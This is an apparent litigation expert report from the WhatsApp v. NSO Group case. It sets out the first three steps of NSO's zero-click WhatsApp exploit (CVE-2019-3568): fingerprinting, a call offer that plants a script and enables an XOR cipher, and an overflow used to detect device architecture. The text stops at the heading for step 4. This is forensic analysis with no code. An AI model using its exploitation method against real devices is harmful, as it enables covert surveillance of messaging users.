# EXHIBIT A

## FILED UNDER SEAL

# EXHIBIT B

## FILED UNDER SEAL

# EXHIBIT C

## FILED UNDER SEAL

# EXHIBIT D

## FILED UNDER SEAL

# EXHIBIT E

## FILED UNDER SEAL

# EXHIBIT F

HIGHLY CONFIDENTIAL – ATTORNEYS EYES ONLY | Expert Witness Opinion of David Youssef

UNITED STATES DISTRICT COURT

NORTHERN DISTRICT OF CALIFORNIA

WHATSAPP INC., et al,.

    Plaintiffs,

       v.

NSO GROUP TECHNOLOGIES
LIMITED, et al.,

    Defendants.

Case No.: 19-cv-07123-PJH

HIGHLY CONFIDENTIAL – ATTORNEYS EYES ONLY

Expert Report of David Youssef

August 30, 2024

HIGHLY CONFIDENTIAL – ATTORNEYS EYES ONLY | Expert Witness Opinion of David Youssef

August 30, 2024

# EXPERT REPORT OF DAVID J. YOUSSEF

IN RE: WHATSAPP INC., ET AL., (PLAINTIFFS), v. NSO GROUP
TECHNOLOGIES LIMITED, ET AL., (DEFENDANTS)

CASE NO.: 19-CV-07123-PJH

**HIGHLY CONFIDENTIAL – ATTORNEYS EYES ONLY**

HIGHLY CONFIDENTIAL – ATTORNEYS EYES ONLY | Expert Witness Opinion of David Youssef

# Table of Contents

EXECUTIVE SUMMARY ................................................................................................................ 1

QUALIFICATIONS AND SCOPE .................................................................................................. 4

    Personal Background ............................................................................................................. 4

    Assignment and Compensation.......................................................................................... 5

    Methodology & Materials Reviewed ................................................................................ 5

    Background of the Litigation .............................................................................................. 7

RELEVANT BACKGROUND .......................................................................................................... 9

    Overview of NSO Group ...................................................................................................... 9

    Overview of WhatsApp ...................................................................................................... 10

    Overview of WhatsApp VoIP Architecture.................................................................... 11

    Overview of Defendants' WhatsApp Exploit............................................................... 12

EVIDENCE VALIDATION ............................................................................................................ 21

DETAILED OPINIONS ................................................................................................................. 26

    Defendant's Exploitation of WhatsApp Infrastructure .......................................... 26

    Function and Impact of Defendants' Spyware............................................................. 29

    Evading Detection .............................................................................................................. 33

    Defendants' Malware Development and Circumvention ......................................... 34

    Defendants' Continued Actions Following Plaintiffs' Remediation ..................... 39

CONCLUSION................................................................................................................................. 41

APPENDIX A: CURRICULUM VITAE ....................................................................................... 42

APPENDIX B: ABOUT FTI CONSULTING CYBERSECURITY .......................................... 44

APPENDIX C: MATERIALS CONSIDERED ............................................................................. 46

Docusign Envelope ID: 5E56B0BD-8069-4B07-8A23-F352D98B4824 Case 4:19-cv-07123-PJH Document 514-2 Filed 01/09/25 Page 10 of 59

HIGHLY CONFIDENTIAL – ATTORNEYS EYES ONLY | Expert Witness Opinion of David Youssef    1

## EXECUTIVE SUMMARY

1.  WhatsApp LLC (f/k/a WhatsApp Inc.) is a subsidiary of Meta Platforms Inc. (f/k/a Facebook Inc.) (collectively "Plaintiffs") registered and headquartered in the United States which manages and operates WhatsApp, a free private messaging application with billions of active users globally, making it one of the most, widely used instant messaging applications in the world. WhatsApp allows users to send text messages, make voice and video calls, share photos, videos, and documents, and more, through the Internet.

2.  NSO Group Technologies Limited and Q Cyber Technologies Limited (collectively "Defendants"), according to Defendants' website, provides "cyber intelligence for global security and stability,"[1] and are widely known for developing malware.

3.  In May 2019, during a security audit, Plaintiffs identified anomalous activity occurring on some of the servers which make up the core communication infrastructure of WhatsApp. Further investigation by Plaintiffs revealed that during and potentially prior to May 2019, Defendants accessed and used, without authorization, WhatsApp Servers in order install Defendants' Malware on mobile devices for the purposes of accessing and exfiltrating information on the mobile devices without authorization.

4.  I[2] have been retained as a technical expert on behalf of Davis Polk & Wardwell LLP ("Counsel") in connection with their representation of Plaintiffs in this matter. I have been asked to analyze and opine on the evidence provided by Plaintiffs, provided by Defendants, and provided to Counsel by the United States Department of Justice ("DOJ"). My analysis of the evidence focuses on Defendants' development and use of a malware (herein, the "Malware") designed to interface with Plaintiffs' infrastructure, which was discovered by Plaintiffs and attributed to Defendants in May 2019.

5.  The scope of my analysis included eight main points of determination:

    - (1) How Defendants' Malware exploited the WhatsApp application and infrastructure;

    - (2) How the Malware accessed and used the WhatsApp infrastructure;

    - (3) How the Malware subsequently accessed and used targeted users' ("Target Users") WhatsApp accounts and their associated devices ("Target Devices");

    - (4) Why the Malware should be considered spyware;

---

[1] https://www.nsogroup.com.

[2] Some of the work described in this report was performed by members of my team at my direction. I have used the pronoun "I" throughout this report to describe both the work I did myself and the work my colleagues performed at my direction.

Docusign Envelope ID: 5E56B0BD-8069-4B97-8A24-E352D98B4824    Case 4.19-cv-07123-PJH    Document 514-2    Filed 01/09/25    Page 11 of 59

HIGHLY CONFIDENTIAL – ATTORNEYS EYES ONLY | Expert Witness Opinion of David Youssef    2

- (5) How the Malware attempted to evade detection by Plaintiffs and targeted WhatsApp users;

- (6) How the Malware adapted to changes and updates in the WhatsApp infrastructure;

- (7) The efforts required of Defendants to reverse engineer and test the WhatsApp code and infrastructure to successfully conduct this exploitation and develop their Malware; and

- (8) The impacts to Plaintiffs' infrastructure and Target Devices.

6.  Regarding how NSO's Malware exploited and accessed Plaintiffs' architecture and subsequently the Target Devices, it is my opinion that Defendants manipulated network traffic related to WhatsApp voice call communications in order to exploit a buffer overflow vulnerability in the WhatsApp Client Application for Android. This network traffic was transmitted through Plaintiffs' network infrastructure, intended to resemble legitimate WhatsApp traffic, and ultimately served to deliver and execute malicious commands on the Target Devices, thereby abusing the architecture and using it in a manner in which it was not intended or authorized by Plaintiffs.

7.  It is my opinion that Defendants' Malware is "spyware." To make this determination, I evaluated the following two characteristics of spyware against the Defendants' Malware: 1) the malware is implemented without the Target Devices' users' awareness; and 2) the malware collects information on Target Devices' users' activity. I determined Defendants' Malware was implemented without the awareness of the Target Devices' users. Yaron Shohat, Chief Executive Officer of NSO Group, stated that Defendants' Malware "deploys an agent which the owner or user of the targeted device is not aware of."[3] Based on Plaintiffs' public statements about their Pegasus product, I determined that Pegasus is designed to collect information from a Target Device related to its user's activity. I did not have access to Pegasus or other code files, which limited my understanding of the ultimate impact to a Target Device after Pegasus or any other spyware had been installed on it. Although I lacked access to Pegasus, I did determine certain information was obtained from the targeted devices during Defendants' exploitation of the relevant vulnerability in WhatsApp, and I concluded that this exploitation most likely served as a delivery and installation vector for Pegasus.

8.  It is my opinion that Defendants designed their Malware to evade detection through manipulation of the network traffic supporting Plaintiffs' voice-call communication, causing the traffic to appear as legitimate. Defendants accomplished this by leveraging

---

[3] Shohat Dep. at 40:1-40:11

Docusign Envelope ID: 5E56B0B9 3069 4B07 8A24 F353D98B4824    Case 4:19-cv-07123-PJH    Document 514-2    Filed 01/09/25    Page 12 of 59

HIGHLY CONFIDENTIAL – ATTORNEYS EYES ONLY | Expert Witness Opinion of David Youssef    3

Plaintiffs' user account functionality in order to appear as legitimate users and encrypting their activity within the manipulated network traffic.

9.  It is my opinion that Defendants updated their Malware to circumvent software updates Plaintiffs made to their servers. Between September and December 2018, Defendants attempted to deliver their exploit to Plaintiffs' servers, but those attempts were blocked by software updates implemented by Plaintiffs. These attempts preceded Defendants' May 2019 attack, which was successful based on apparent changes Defendants made to their Malware to address Plaintiffs' 2018 software updates.

10. It is my opinion that Defendants reverse engineered Plaintiffs' software and tested their Malware on Plaintiffs' servers and mobile client application ("WhatsApp Client Application").

11. Finally, it is my opinion that Defendants' Malware was used to successfully exploit at least 1,500 targeted devices. Further, based on Defendants' business model, it is my opinion that Defendants will continue to develop exploits targeting Plaintiffs servers and client applications.

Docusign Envelope ID: 5E56B0BD-8069-4B97-8A24-F352D98B4824    Case 4:19-cv-07123-PJH    Document 514-2    Filed 01/09/25    Page 13 of 59

HIGHLY CONFIDENTIAL – ATTORNEYS EYES ONLY | Expert Witness Opinion of David Youssef    4

## QUALIFICATIONS AND SCOPE

12. I, David J. Youssef, am employed as a Managing Director at FTI Consulting, Inc. ("FTI"). I have been retained by Davis Polk & Wardwell LLP ("Counsel") in connection with their representation of Plaintiffs in this matter.

### Personal Background

13. I have more than 15 years of experience working as a cybersecurity professional in both private industry and academia. My extensive knowledge in the fields of incident response, crisis management, advanced threat research, malware analysis, cyber resiliency, cloud security engineering, offensive security, and secure software development has led to my position as a Managing Director with FTI Consulting, specifically in its Cybersecurity practice with the Forensic Litigation & Consulting segment. I have assisted various clients with the analysis of malicious software to determine its entry and exploitation, behavior, and obfuscation tactics. The techniques relied upon in this analysis have applicability across multiple cybersecurity and data privacy engagements I have performed and led.

14. Prior to joining FTI Consulting, I served as Vice President and Global Lead of the Integrated Cyber Threat Analysis Team at Citigroup's Cyber Security Fusion Center. There, I coordinated Citi's intelligence-led, threat-focused approach to incident avoidance and risk reduction. I was the lead coordinator of response efforts during critical cyber events and crises, orchestrating evidence collection, intelligence integration, and mitigation efforts among Fusion Center teams. In addition, I spearheaded the creation of an interdisciplinary Advanced Persistent Threat hunt capability that focused on proactively defending and protecting against advanced malware distributed by sophisticated nation state and cyber-criminal groups.

15. Before my role at Citi's Fusion Center, I served as Assistant Vice President for Citi Security and Investigative Services, responding to global cyber incidents and specializing in digital forensics, electronic crimes, and malware analysis. I actively engaged in liaison activities with various domestic and international law enforcement and government agencies to best understand emerging cyber threats and aided in the disruption of several malware botnets cyber-criminal rings.

16. I was an Adjunct Professor of Cybersecurity at Fordham University, where I taught various graduate and undergraduate courses on topics including incident response, digital forensics, network security, penetration testing, and critical infrastructure. Also at Fordham, I served on the organizing committee of the International Conference on Cyber Security, an annual summit held in partnership with the Federal Bureau of Investigation

Docusign Envelope ID: 5E56B0BD-8069-4B07-8A24-E353D98B4824   Case 4:19-cv-07123-PJH   Document 514-2   Filed 01/09/25   Page 14 of 59

HIGHLY CONFIDENTIAL – ATTORNEYS EYES ONLY | Expert Witness Opinion of David Youssef   5

in which experts from the government, the private sector, and academia gather to share critical intelligence on issues shaping the future of cybersecurity.

## Assignment and Compensation

17.  Due to my expertise in cybersecurity and digital forensics, I have been asked to review the facts about the exploit utilized by Defendants against Plaintiffs' services, Defendants' related conduct, and all materials cited within this expert report, as made available by Counsel. Professionals from FTI, who worked under my direction, have assisted me on this assignment. The fees paid to FTI are not contingent on the outcome of this matter or the opinions expressed herein. I reserve the right to supplement, update, or otherwise modify my opinions and my report. I am not a lawyer and the opinions offered in this report are not legal opinions.

## Methodology & Materials Reviewed

18.  In performing this assignment, I have reviewed relevant information made available by Counsel, including logs and code related to the exploit at issue in this litigation. I have also drawn on my own background, experience and expertise in similar matters to form the conclusions and opinions about how the relevant artifacts I inspected were designed and for what purpose.

19.  Counsel provided the following materials with which to conduct my analysis and inform my findings. I understand from Counsel that Defendants have not yet produced all relevant information that Plaintiffs sought. I reserve the right to amend my report if new information becomes available.

- Plaintiffs' internal documentation, including technical information relating to Plaintiffs' architecture;

- Plaintiffs' internal engineering tickets;[4]

- Log files derived from Plaintiffs' servers or network infrastructure as part of Plaintiffs' investigation into the exploit; and

- Various computer scripts, related configurations and assets, and log files, which I understand were produced by the U.S. Department of Justice (DOJ) and derived from a cloud computing server controlled by Defendants at the time of the incident. I will refer to this server as Defendants' Server;

---

[4] A "ticket" here refers to a digital record created within a ticketing system to manage and track issues, requests, or tasks. This is intended to facilitate communication of users and support teams toward the efficient resolution of problems.

Docusign Envelope ID: 5E56B0BD-8069-4B97-8A24-F352D98B4824   Case 4:19-cv-07123-PJH   Document 514-2   Filed 01/09/25   Page 15 of 59

HIGHLY CONFIDENTIAL – ATTORNEYS EYES ONLY | Expert Witness Opinion of David Youssef   6

- NSO documentation produced during discovery which I believe to have originated from NSO's internal documentation repositories.

20. I reviewed a set of log files and files containing code that I obtained from Plaintiffs related to Defendants' Server, which I understand was produced to Plaintiffs by the DOJ, to analyze and validate the steps taken by Defendants' Malware during the exploitation. While the full list of files reviewed are contained in Appendix C, files of particular relevance are listed below:

- "abs.log"[5] which contains events between February 19, 2019 through May 2, 2019;
- "more_human_readable_abs.log"[6] [7] which contains events between February 19, 2019 through May 2, 2019;
- "heaven.log"[8] which contains events between February 19, 2019 through May 2, 2019;
- "wis.log"[9] which contains events from January 20, 2019;
- "wis.log.2019-01-17"[10] which contains events between January 16, 2019 and January 17, 2019;
- "wis.log.2019-01-24"[11] which contains events between January 20, 2019 and January 24, 2019;
- "Signaling.py" contains WhatsApp servers host names and ports;
  - Example Servers: "e1.whatsapp.net," "e2.whatsapp.net," "e12.whatsapp.net;"
  - Ports: [443, 5222];
- "Funxmpp.py" which contains code used for WhatsApp protocols; and
- "Protocol.py"[12] which contains code for monitoring Noise Pipe.

---

[5] WA-NSO-00017151.

[6] WA-NSO-00017151.

[7] Both "abs.log" and "more_human_readable_abs.log" contain identical logged activities. However, "more_human_readable_abs.log" has been reformatted to facilitate review and display.

[8] WA-NSO-00017133.

[9] WA-NSO-00016436.

[10] WA-NSO-00017131.

[11] WA-NSO-00017132.

[12] WA-NSO-00016505.

Docusign Envelope ID: 5E56B0BD-3069-4B97-8A24-F95AD98B4824
Case 4:19-cv-07123-PJH Document 514-2 Filed 01/09/25 Page 16 of 59

HIGHLY CONFIDENTIAL – ATTORNEYS EYES ONLY | Expert Witness Opinion of David Youssef     7

21. I also reviewed materials related to Defendants' Server including computer scripts. The scripts are stored in three folders, "alternate_copy," "android-backend-server," and "wis." The provided scripts do not appear to constitute the entirety of Defendants' Malware and therefore provide incomplete insight into the exploitation capabilities of Defendants' Malware. It is my understanding that the "android-backend-server" folder maintains the most recent iteration of scripts, and therefore I primarily referred to the scripts stored in the "android-backend-server" folder.

22. The documents upon which I relied in forming my opinions are cited in this report. A full list of the documents and materials considered is attached as Appendix C. I understand additional materials and information may be collected as part of the discovery process which remains ongoing in this proceeding. In particular, I understand from Counsel that Defendants have not permitted me access to code or documents about the apparent exploit, including source code that I am not permitted to access because I am located in the United States, and I am not an Israeli citizen. Furthermore, I understand Defendants prohibited me from reviewing any materials marked as "Highly Confidential-Attorneys Eyes Only" by Defendants or non-parties represented by Defendants' counsel, and the Court only overruled Defendants' objection on August 27, 2024. As such, I have not had an opportunity to analyze "Highly Confidential-Attorney Eyes Only" materials from Defendants' or non-parties represented by Defendants' counsel. It may be necessary for me to supplement or revise the opinions set forth below if I receive more information relevant to my assignment. Nevertheless, I am comfortable with my conclusions at this time based upon the information I have accessed and analyzed as of August 30, 2024.

## Background of the Litigation

23. I understand Plaintiffs filed this action against Defendants on October 29, 2019, asserting claims under the Computer Fraud and Abuse Act ("CFAA"), 18 U.S.C. § 1030, the California Comprehensive Computer Data Access and Fraud Act ("CDAFA"), California Penal Code § 502, and claims for breach of contract of WhatsApp's Terms of Service.

24. According to the complaint in this action (the "Complaint"), "[b]etween in and around April 2019 and May 2019, Defendants used WhatsApp Servers, located in the United States and elsewhere, to send malware to approximately 1,400 mobile phones and devices… designed to infect the [T]arget [D]evices for the purpose of conducting surveillance of specific WhatsApp users."[13] The Complaint alleges "Defendants' actions were not authorized by Plaintiffs and were in violation of WhatsApp's Terms of Service,"

---

[13] Compl. ¶ 1, Dkt. No. 1.

Docusign Envelope ID: 5E56B0BD-8069-4B97-8A24-F359D98B4824   Case 4:19-cv-07123-PJH   Document 514-2   Filed 01/09/25   Page 17 of 59

HIGHLY CONFIDENTIAL – ATTORNEYS EYES ONLY | Expert Witness Opinion of David Youssef   8

and thus violated federal and state law, and breached the parties' agreement reflected in WhatsApp's Terms of Service.[14]

25. Plaintiffs have asserted claims under the CFAA and CDAFA as well as claims for breach of WhatsApp's Terms of Service. I am not an attorney and I offer no opinions about the law. All of my understanding of legal issues relevant to this case is based on information provided to me by Counsel.

26. I understand the CFAA imposes civil and criminal penalties when an individual "intentionally accesses a computer without authorization or in a manner which exceeds authorized access, and thereby obtains . . . information from any protected computer,"[15] "knowingly and with intent to defraud, accesses a protected computer without authorization, or exceeds authorized access, and by means of such conduct further the intended fraud and obtains anything of value,"[16] or "knowingly and with intent to defraud traffics . . . in any password or similar information through which a computer may be access without authorization."[17]

27. I further understand WhatsApp's Terms of Service prohibits users from "exploiting [WhatsApp's] Services in impermissible or unauthorized manners, or in ways that burden, impair, or harm [Plaintiffs], [Plaintiffs'] services, systems, [Plaintiffs'] users, or others." I will detail later in this report the specific sections of WhatsApp's Terms of Service Defendants potentially violated during the 2019 exploit as identified by Plaintiffs.

---

[14] Compl. ¶ 1, Dkt. No. 1.

[15] 18 U.S.C § 1030(a)(2). A "protected computer" is defined as any computer "used in or affecting interstate or foreign commerce or communication." 18 U.S.C § 1030(e)(1).

[16] 18 U.S.C § 1030(a)(4).2q

[17] 18 U.S.C § 1030(a)(6).

Docusign Envelope ID: 5E56B0BD-3069-4B07-8A24-F35BD98B4824  Case 4:19-cv-07123-PJH   Document 514-2   Filed 01/09/25   Page 18 of 59

HIGHLY CONFIDENTIAL – ATTORNEYS EYES ONLY | Expert Witness Opinion of David Youssef    9

## RELEVANT BACKGROUND

### Overview of NSO Group

28. NSO Group Technologies Limited is a private Israeli technology and cyber-surveillance company. Q Cyber Technologies Limited was, during the relevant time period, its sole director and majority shareholder.[18]

29. Defendants are primarily known for their Spyware product, "Pegasus," which is designed to "remotely and covertly" extract information from "virtually any mobile device, as well as to surveil and eavesdrop on the users."[19][20] Notably, Pegasus can be delivered to Target Devices, specifically iOS and Android mobile devices, without any required user interaction; this is known as "zero-click" exploitation. With this capability, Defendants' Spyware can be installed on targeted devices without targeted users' knowledge and without the need to trick the user into performing any particular action, such as clicking on a malicious link (known as "one-click" exploitation). Target Devices can be exploited by simply receiving a text message, or in this case, a WhatsApp voice call offer.

30. Once a Target Device has been compromised by Defendants, their Pegasus Spyware can be installed on the device and used to surreptitiously access and extract sensitive information such as voice calls, messages, multimedia including photos and videos, emails, location history, etc. Pegasus is also capable of passively monitoring, activating phone settings to collect data, and defining triggers to initiate data collection.[21]

31. It is my understanding that Defendants invest considerable resources in the identification of software vulnerabilities, specifically "zero-day"[22] and "zero-click" vulnerabilities, and the development of exploits for those vulnerabilities which can facilitate the delivery and installation of Defendants' Spyware on targeted devices. Defendants have in the past, and continue to, maintain staff dedicated to the intensive research and identification of novel security vulnerabilities in various commonly used applications, such as WhatsApp, in

---

[18] Declaration of Shalev Hulio in Support of Defs' Motion to Dismiss (Dkt. No. 45-11) (Apr. 2, 2020).

[19] Compl. Ex. 10, Dkt. No. 1.

[20] Defs' Apr. 17, 2023 Responses & Objections to Pls' Requests for Admission, Response to RFA No. 14 (admitting "Exhibit 10 to the Complaint appears to be an authentic copy of a document authored by Defendants titled "Pegasus-Product Description," which described some features of Pegasus at the time it was written, which Defendants believe occurred in 2012").

[21] Compl. Ex. 10, Dkt. No. 1.

[22] A zero-day exploit is the delivery of a security flaw in a particular piece of software or hardware which is unknown to the vendor and to the public, for which no fix has been made available.

Docusign Envelope ID: 5E56B0BD-8069-4B97-8A24-E352D98B4824
Case 4.19-cv-07123-PJH   Document 514-2   Filed 01/09/25   Page 19 of 59

HIGHLY CONFIDENTIAL – ATTORNEYS EYES ONLY | Expert Witness Opinion of David Youssef   10

order to continuously propagate their malware products to the extent desired by Defendants or their customers.[23]

## Overview of WhatsApp

32.  WhatsApp is a communication service and associated application which offers its users multiple forms of encrypted Internet-based communications such as text/multimedia messaging and voice over Internet Protocol ("VoIP")[24] telephony. WhatsApp enables these communications with official client-side applications across multiple different platforms (including iOS, Android, Windows, macOS, and web browsers). Communications between users are mediated and facilitated by WhatsApp Servers.

33.  WhatsApp comes at no cost to the consumer, and the application is available for users to download for free from app stores. A prospective user must create an account and agree to the WhatsApp Terms of Service in order to begin using the WhatsApp service.

34.  WhatsApp's user base has grown significantly over the past decade. The table below illustrates the platform's rapid adoption by users worldwide:

| Date | Number of WhatsApp Users |
|---|---|
| December 19, 2013 | 400,000,000[25] |
| April 22, 2014 | 500,000,000[26] |
| February 1, 2016 | 1,000,000,000[27] |
| February 12, 2020 | 2,000,000,000[28] |

35.  WhatsApp is marketed as a secure, reliable, and private communication method due to its use of end-to-end encryption ("E2EE").[29] Specifically, WhatsApp is designed to ensure messages and calls between WhatsApp users are accessible to only the parties involved in the communication; as part of this model, no entity positioned between the "ends" of the communication, inclusive of WhatsApp systems and staff, is capable of decrypting and

---

[23] Press Release, NSO Group Acquired by its Management, Francisco Partners (Compl. Ex. 4 (Dkt. No. 1)).

[24] VoIP is a communication technology that allows users to make voice calls over broadband Internet connections rather than traditional analog telephony services.

[25] https://blog.whatsapp.com/400-million-stories.

[26] https://blog.whatsapp.com/500-000-000.

[27] https://blog.whatsapp.com/one-billion.

[28] https://blog.whatsapp.com/two-billion-users-connecting-the-world-privately.

[29] End-to-end encryption is a secure messaging feature designed to keep messages private from all third parties, including the messaging service. A message will only appear in readable form to the sender and recipient of the message.

reading the associated message contents.[30] WhatsApp achieves this level of security by leveraging encryption keys known only by the WhatsApp Client Applications operated by the users partaking in a given communication exchange.

36. In my opinion, the nature of the service provided by WhatsApp as a privacy-oriented communications platform, together with its widespread global adoption, is what made WhatsApp a high-priority target for Defendants in seeking to identify mechanisms through which to deliver their Malware to Target Devices.

## Overview of WhatsApp VoIP Architecture

37. I understand from Plaintiffs that the WhatsApp VoIP infrastructure uses a proprietary call management system to establish and process voice call communications between users. WhatsApp's call management system and VoIP infrastructure is supported by WhatsApp's Signaling Servers[31] and Relay Servers,[32] and underpinned by protocols and standards including Real-time Transport Protocol ("RTP"),[33] Real-time Transport Control Protocol ("RTCP"),[34] Session Traversal Utilities for NAT ("STUN"),[35] and WhatsApp's proprietary variant of the Extensible Messaging and Presence Protocol ("XMPP") referred to internally by Plaintiffs as "FunXMPP."

38. WhatsApp Signaling Servers facilitate the initiation of VoIP calls between user devices hosting the WhatsApp Client, whereas WhatsApp Relay Servers facilitate data transmissions, such as call audio to and from the user devices.[36] To clarify, when referencing the WhatsApp Client, I am referring to the legitimate WhatsApp Client Application developed and distributed by Plaintiffs through authorized channels.

39. It is my understanding that a call relay session occurs when a user (the "sender" or the "caller") initiates a call. WhatsApp Signaling Servers notify the directed user (the

---

[30] https://faq.whatsapp.com/820124435853543.

[31] Signaling Servers handle the initiation of voice calls, which involves making the recipient's device "ring" or receive notification of an incoming call; if the recipient accepts the call, the Signaling Server will connect the call. After that point, the Signaling Server handles any actions which alter the state of the call, such as a participant ending the call.

[32] Relay Servers maintain the connections of voice calls controlling the manner in which packets containing the call audio are transmitted back and forth between participants' devices.

[33] Real-time Transport Protocol ("RTP") is a network protocol that handles traffic involving audio and video over the Internet.

[34] Real-time Transport Control Protocol ("RTCP") is a control protocol that supports RTP, with the main function of monitoring the quality and delivery of data.

[35] Session Traversal Utilities for NAT ("STUN") is a standard, including a network protocol, for maintaining connectivity across Network Address Translation ("NAT") gateways.

[36] Gheorghe Dep. at 31:13-32:22.

Docusign Envelope ID: 5E56B0BD-8069-4B07-8A24-F353D98B4824    Case 4:19-cv-07123-PJH    Document 514-2    Filed 01/09/25    Page 21 of 59

HIGHLY CONFIDENTIAL – ATTORNEYS EYES ONLY | Expert Witness Opinion of David Youssef    12

"recipient") of the incoming call; the recipient then has the option to accept, reject, or ignore the incoming call. If the recipient accepts the call, the WhatsApp Signaling Server establishes the connection and the WhatsApp Relay Server maintains the connection for the duration of the call. During this process, the sender sends a packet to the Relay Server, which then forwards the packet to the recipient.[37] RTP packets are used to transport the audio and video traffic over the Internet, while RTCP packets manage and monitor the delivery of the RTP functionality.

40. For purposes of the exploit detailed in this expert report, it is my understanding, supported by Plaintiffs' internal analysis of the exploit, that there is an optimization located in the code path prior to the RTCP handler, which is utilized for an early calculation of round-trip time. This code path will store an incoming RTCP Sender Report ("SR") and Receiver Report ("RR") in a temporary buffer. From there, the temporary buffer is used to make the SR and RR immediately available to the RTCP layer when the target user answers a call.

## Overview of Defendants' WhatsApp Exploit

41. I understand that when Plaintiffs' discovered Defendants' unauthorized activity, Plaintiffs conducted a preliminary investigation into the exploit. Plaintiffs entered the vulnerability into MITRE Corporation's Common Vulnerabilities and Exposures ("CVE") database under the identifier CVE-2019-3568. This was described as a "buffer overflow vulnerability in WhatsApp VOIP stack [allowing] remote code execution via [a] specially crafted series of RTCP packets sent to a target phone number."[38] The vulnerability was considered to be a zero-day vulnerability since it had not been previously disclosed or mitigated.

42. A "buffer" is an area of computer memory[39] set aside by a process to hold data temporarily. A "buffer overflow" is a type of software vulnerability in which a program can be induced to write more data to a buffer than the buffer is designed to store. When a buffer overflow occurs, the excess data is written to adjacent locations in memory. This may corrupt or overwrite existing data in those locations, resulting in unintended behavior such as a program crash. It may also be leveraged, for malicious purpose, to

---

[37] Gheorghe Dep. at 172:21-173:3.

[38] https://nvd.nist.gov/vuln/detail/CVE-2019-3568.

[39] Computer memory refers to the electronic components of a computer which store data and instructions related to running processes and facilitate the retrieval of this information for processing. Memory should not be confused with storage, e.g. the disk drive of the device; information stored in memory is volatile, meaning that memory is "wiped" when the device is powered off, and repopulated when the device is powered on and used. For the purposes of my report, "memory" specifically refers to the logical space these components in which data can be stored and indexed.

Docusign Envelope ID: 5E56B0BD-3069-4B07-8A24-F35BD98B4824 Case 4:19-cv-07123-PJH    Document 514-2    Filed 01/09/25    Page 22 of 59

HIGHLY CONFIDENTIAL – ATTORNEYS EYES ONLY | Expert Witness Opinion of David Youssef    13

insert computer code into memory and precisely overwrite pieces of data in memory to manipulate the legitimate running process's logic to execute that code.

43.  I reviewed the materials made available to me to develop a comprehensive understanding of the exploitation activity observed by Plaintiffs beginning on May 2, 2019. These materials are reflective of the exploitation having been conducted by an automated process Defendants referred to as "heaven," which was specifically designed to compromise Android mobile devices, WhatsApp Servers, and the WhatsApp Client Application. Defendants' Malware leveraged WhatsApp infrastructure to manipulate the WhatsApp Client Application running on those Target Devices through a series of actions which I will refer to as the "exploit chain."

44.  I have broken down the observed exploit chain into eight stages or "steps," each of which I understand to have been crucial to Defendants' successful compromise of a Target Device. My understanding of each step based on my review and analysis is as follows.

**Step 1: Fingerprinting of Target Device**

45.  Defendants first conducted "fingerprinting" of the Target Device. Fingerprinting is a technique used to identify certain hardware and software characteristics of a Target Device and associated WhatsApp Client Application, which can then inform an attackers' subsequent exploitation.

46.  I was able to confirm fingerprinting activity was successful, based on log evidence that showed the collected information about the Target Device, which included operating system, WhatsApp Client Application version, and the make and model of the Target Device.

**Step 2: Delivery of Malicious Call Offer to Target Device**

47.  If the fingerprinting step determined that the Target Device was susceptible to exploitation, the second step involved "heaven" sending a call offer message with manipulated settings[40] to the Signaling Server for delivery to the Target Device. One of these manipulated call settings enabled an XOR cipher,[41] a basic method of encryption intended to obfuscate the content of a message, for subsequent RTCP transmissions. The XOR encryption allowed for subsequent messages sent by "heaven" to resemble legitimate RTCP packets, thereby concealing the malicious nature of the traffic. I understand that the option to enable an XOR cipher was implemented within the WhatsApp infrastructure but was not in use by ordinary WhatsApp users and was not

---

[40] A call offer message is sent by device to initiate a communication session with a recipient.

[41] XOR Encryption is a form of symmetric encryption that leverages the same key for encryption and decryption of a message.

publicly documented. Furthermore, I understand that the legitimate WhatsApp Client Application did not afford users the ability to enable the XOR cipher.

48. The second manipulated call setting was the "connecting_tone_desc" field, which I understand was no longer used for any legitimate purpose as of 2019. The "heaven" malware inserted a malicious bash script[42] into this field. Upon receipt of the malicious call offer by the WhatsApp Client Application on the Target Device, the malicious bash script contained within this field was loaded into the memory of the Target Device while the Target Device was still ringing and before the call could have been accepted or declined. The malicious bash script remained present in the Target Device's memory throughout the remainder of the attack, specifically in the memory region used by libwhatsapp.so, which is a software library used by the WhatsApp Client Application for various functionalities. The proximity of the "connecting_tone_desc" variable and other variables which "heaven" was able to control, to other components of libwhatsapp.so is of significance to later stages of the exploit chain.

49. The malicious script was inserted into memory of a Targeted Device, but not executed until a subsequent phase of the attack, as achieving code execution through a buffer overflow against modern systems and applications requires the gathering of additional information (specifically, the device's architecture and the version and base address of libwhatsapp.so) in order to compute the address of "connecting_tone_desc" in memory and subsequently interact with its content.

**Step 3: Identification of Target Device Architecture**

50. As the third step in the exploit chain, "heaven" transmitted packets through the WhatsApp Relay Servers which were crafted to induce the victim's WhatsApp Client Application to disclose information about the underlying architecture of the Target Device. Specifically, determining whether the Target Device was a 64-bit device or an older 32-bit device was required for "heaven" to carry out subsequent stages of the attack, as 64-bit devices and 32-bit devices handle the allocation of memory and processing of instructions differently. When I refer to a device's "architecture" in this section of the report, I am referring to the 32-bit or 64-bit nature of the relevant device.

51. While the Target Device was ringing in response to the call offer sent by "heaven" and received from the WhatsApp Signaling Server, but before the victim could have accepted or declined the call offer, the Target Device began relay negotiation and bandwidth estimation with "heaven" via a WhatsApp Relay Server. This is a legitimate function of

---

[42] A bash script is a common form of program on Linux computers, which comprises a series of commands to be interpreted by the operating system's shell interpreter. The Android operating system is based on Linux, so Android devices can execute bash scripts.

WhatsApp's VoIP infrastructure, known as "bit width detection," which allows for the two devices to estimate the volume of data which can be efficiently sent and received over a given interval. At this stage, "heaven" exploited the buffer overflow by sending an oversized bit width detection packet to the Target Device via the WhatsApp Relay Server, effectively abusing the legitimate function of the Relay Server.

52. Due to the fact that the oversized bit width negotiation packet sent by "heaven" was stored in a buffer in close proximity to other types of call context data in the Target Device's memory, the overflowed buffer could overwrite the values of some other call context variables in memory. One of these variables was the "Af" variable, which ordinarily stores information affecting the Target Device's bandwidth estimation. Given the different manners of memory allocation between devices of different architectures, an oversized buffer of a given size would overwrite "Af" on a 32-bit phone, but not on a 64-bit phone. If "Af" was overwritten, the Target Device's bandwidth estimation data returned to "heaven" would change, and "heaven" could detect this change, enabling it to identify the architecture of the Target Device.

53. After the devices exchanged bandwidth estimation packets, "heaven" sent a duplicate call offer message to the Target Device through the WhatsApp Signaling Server. This duplicate call offer message, which is not sent during an ordinary WhatsApp call establishment process, triggered a transport restart and resulted in the reset of areas of the Target Device's internal memory related to the state of the VoIP call, since some of this data had been overwritten during the malicious bandwidth estimation exchange.

**Step 4: Memory Information Disclosure**

